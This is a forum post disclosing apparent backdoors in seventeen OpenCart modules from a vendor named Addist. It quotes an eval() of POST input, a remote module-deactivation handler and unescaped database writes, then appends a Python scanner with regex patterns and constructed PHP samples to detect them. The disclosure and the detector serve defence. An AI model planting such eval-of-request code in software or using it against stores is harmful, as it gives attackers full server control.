Post by RHCk » Mon Jan 23, 2017 4:43 am

We have found a critical vulnerability in the modules from Addist.

Modules:
Module_01
Module_02
Module_03
Module_04
Module_05
Module_06
Module_07
Module_08
Module_09
Module_10
Module_11
Module_12
Module_13
Module_14
Module_15
Module_16
Module_17

Found in the module files:
1.

Code:

@eval($this->request->post['command']);
This code allows anyone to execute any command on your server using the eval() function.
If you have modules from Addist, then getting FTP access to your store takes 5 seconds. Whether Addist made this on purpose or accidentally doesn't matter. The fact is that these modules turned out to have nearly 1,000 owners of working shops.

2.

Code:

if (!empty($this->request->get['deactivate']))
{
$this->cache->delete($this->request->get['deactivate']);
$this->config->remove($this->request->get['deactivate']);
}
A tool that also allows enabling or disabling the Addist module from the outside, by remote command to the server. With this you can disable any module.

3.

No escaping when writing to the database, and the data is assembled as appropriate; with this bug you can make a request to the store's database, for example to add superadmin rights to a user, and from there getting full access to the shop is not a problem.

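A defensive scan for the patterns described in this thread, added here as an example that is not from the original post or from Addist's code: it flags PHP files that pass request input straight into eval() or into config/cache removal, covering OpenCart's $this->request fields and, going a little beyond the post, raw PHP superglobals. The sample inputs are constructed; the rule names and function names are my own.

```python
import re

# Inputs an attacker controls directly: OpenCart's request object fields
# (as in the snippets quoted above) and, more generally, raw PHP superglobals.
REQUEST_INPUT = (r"(?:\$this->request->(?:post|get|request)|\$_(?:POST|GET|REQUEST))"
                 r"\s*\[\s*['\"][^'\"]*['\"]\s*\]")

# Each rule pairs a name with a regex for one of the behaviours described in the post.
RULES = [
    ("eval-of-request-input", re.compile(r"@?\beval\s*\(\s*" + REQUEST_INPUT, re.I)),
    ("remote-config-removal", re.compile(r"\$this->config->remove\s*\(\s*" + REQUEST_INPUT)),
    ("remote-cache-deletion", re.compile(r"\$this->cache->delete\s*\(\s*" + REQUEST_INPUT)),
]


def find_backdoor_indicators(source: str) -> list:
    """Return (rule name, 1-based line number) pairs for every match in PHP source."""
    hits = []
    for name, pattern in RULES:
        for m in pattern.finditer(source):
            hits.append((name, source.count("\n", 0, m.start()) + 1))
    return sorted(hits, key=lambda h: h[1])


def scan_file(path: str) -> list:
    """Scan one PHP file on disk (e.g. every file under an OpenCart upload/ tree)."""
    with open(path, encoding="utf-8", errors="replace") as f:
        return find_backdoor_indicators(f.read())


# Constructed samples modelled on the quoted snippets; not real Addist module code.
SAMPLE_EVAL_BACKDOOR = "<?php\n@eval($this->request->post['command']);\n"
SAMPLE_REMOTE_DEACTIVATE = (
    "<?php\n"
    "if (!empty($this->request->get['deactivate']))\n"
    "{\n"
    "$this->cache->delete($this->request->get['deactivate']);\n"
    "$this->config->remove($this->request->get['deactivate']);\n"
    "}\n"
)
SAMPLE_BENIGN = "<?php\n$name = $this->db->escape($this->request->post['name']);\n"

if __name__ == "__main__":
    import sys
    # Usage: python scan.py path/to/module/*.php
    for path in sys.argv[1:]:
        for rule, line in scan_file(path):
            print(f"{path}:{line}: {rule}")
```

Run it over the catalog/ and admin/ controller directories of a store that has any of the listed modules installed; a hit on any rule is reason to take the module offline and review the file by hand.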